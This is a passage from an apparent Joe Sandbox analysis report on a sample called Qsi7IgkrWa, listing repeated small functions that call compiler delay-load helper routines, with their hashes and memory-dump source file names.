Opcode ID: 4409164df3f25ab4c34c90cdf92dabd14645736925a446a2f99e6b7e307b3c00
Instruction ID: 4f0f1361f4114e454f55bd24947fafa5f84051387d24343560bcadbbdbaf3e6a
Opcode Fuzzy Hash: 4409164df3f25ab4c34c90cdf92dabd14645736925a446a2f99e6b7e307b3c00
Instruction Fuzzy Hash: 97B012C22A9080FC310451555D06E3B01DCC0C1B1433042AEF424D2080FC408D421535

Function 00BCE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0f9f326ea94c2d73607d25d5fbae2201a75aa9bf7501aa75e9f5b23ea039fe55
Instruction ID: 787d59e5c1eed600abed36edb5b9eea4d61fd2aa4f6a635e3b5cf598f28b4781
Opcode Fuzzy Hash: 0f9f326ea94c2d73607d25d5fbae2201a75aa9bf7501aa75e9f5b23ea039fe55
Instruction Fuzzy Hash: 6BB012C2269080FD310451551C02E7B01CCC0C1B1433040EEF824C2080F8408C511535

Function 00BCE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 87b744b4f55064f5bdcbd719861226d4d6ae12f772a49d50bf97aafed087bf3e
Instruction ID: 1def4a452fe6db26459597b27673fb3e3c67621fbfd3d7544db40fbdbba1f8af
Opcode Fuzzy Hash: 87b744b4f55064f5bdcbd719861226d4d6ae12f772a49d50bf97aafed087bf3e
Instruction Fuzzy Hash: B7B012C1659180FD310492091C02F3B05CCC0C7F1433040EEF824C1080FC408C411431

Function 00BCE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d4de9fc4d9e17e11bdbc7d8fa2bbeffed34db92f190808637c2731bb75abb27
Instruction ID: 97b5ef6663285b67973e9c50dda36301af4b61587bc8c3be67e8b42c79bbbc3e
Opcode Fuzzy Hash: 5d4de9fc4d9e17e11bdbc7d8fa2bbeffed34db92f190808637c2731bb75abb27
Instruction Fuzzy Hash: 11B012C16591C0FC310452091D02E3B09CCC0C7F1433080EEF824C1080FC408C421431

Function 00BCE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c48f6aa9f4137fee3e59430dff0228562e1e02e28241d382f9811ffc45a05c12
Instruction ID: d7dfe87368d2dbfd883f133a779597156ae9032b6c0afab8204419401bb85e13
Opcode Fuzzy Hash: c48f6aa9f4137fee3e59430dff0228562e1e02e28241d382f9811ffc45a05c12
Instruction Fuzzy Hash: 0BB012D1259180FC310452251C06E3B05CCC0C3F1433040BEF434C0481F8408D451431

Function 00BCE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54c23b1849eefdf9274c5a3e442b5cdff18ab632dbf384328de203b32e903c00
Instruction ID: 2e5814d4e96c52450d3fd284bc04f263fdc86261d91ec3b2ac0ee40e32525e03
Opcode Fuzzy Hash: 54c23b1849eefdf9274c5a3e442b5cdff18ab632dbf384328de203b32e903c00
Instruction Fuzzy Hash: 8EB012C1259280FC320452095C07E3B0DCCC0C7F1433042AEF424C1080F8408D851431

Function 00BCE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b926b58c13bafac2cc4cba901821b19a2ec0192d9db9c1928c9479216deff613
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: b926b58c13bafac2cc4cba901821b19a2ec0192d9db9c1928c9479216deff613
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f8c3547dce5aaf9f3f532374e79059219347032a037964712e835960a79d0a89
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: f8c3547dce5aaf9f3f532374e79059219347032a037964712e835960a79d0a89
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ee05eee60d3bcddb18b9b8e31010ffcca1253904c7af2f82f4cd01a8f3133ec
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 0ee05eee60d3bcddb18b9b8e31010ffcca1253904c7af2f82f4cd01a8f3133ec
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8b33129dab8264c47fa76480b2020b2040759a66f4412a6140a204d16d108666
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 8b33129dab8264c47fa76480b2020b2040759a66f4412a6140a204d16d108666
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 031ac3f42bac112f5d7df0438b8b22421b66b2642a64bde7d21f0221f2a2ba9d
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 031ac3f42bac112f5d7df0438b8b22421b66b2642a64bde7d21f0221f2a2ba9d
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7324971fe20523ac2b3905f2f01649dfa12b74aa9e858e44f0afeabb312d3054
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 7324971fe20523ac2b3905f2f01649dfa12b74aa9e858e44f0afeabb312d3054
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 01f22e82e65d022702433ba19fbc264999ad9b3a39583b428ed5073f76658cf2
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 01f22e82e65d022702433ba19fbc264999ad9b3a39583b428ed5073f76658cf2
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 74427a466efc2d2ebf2af4909eb778d4eac8e53eaba3fbfd73700960f2f20d95
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 74427a466efc2d2ebf2af4909eb778d4eac8e53eaba3fbfd73700960f2f20d95
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3784754bb7607d6a52d98e332bcb78446df8bc9eb03d70d086bbb7f177c8a1e5
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 3784754bb7607d6a52d98e332bcb78446df8bc9eb03d70d086bbb7f177c8a1e5
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
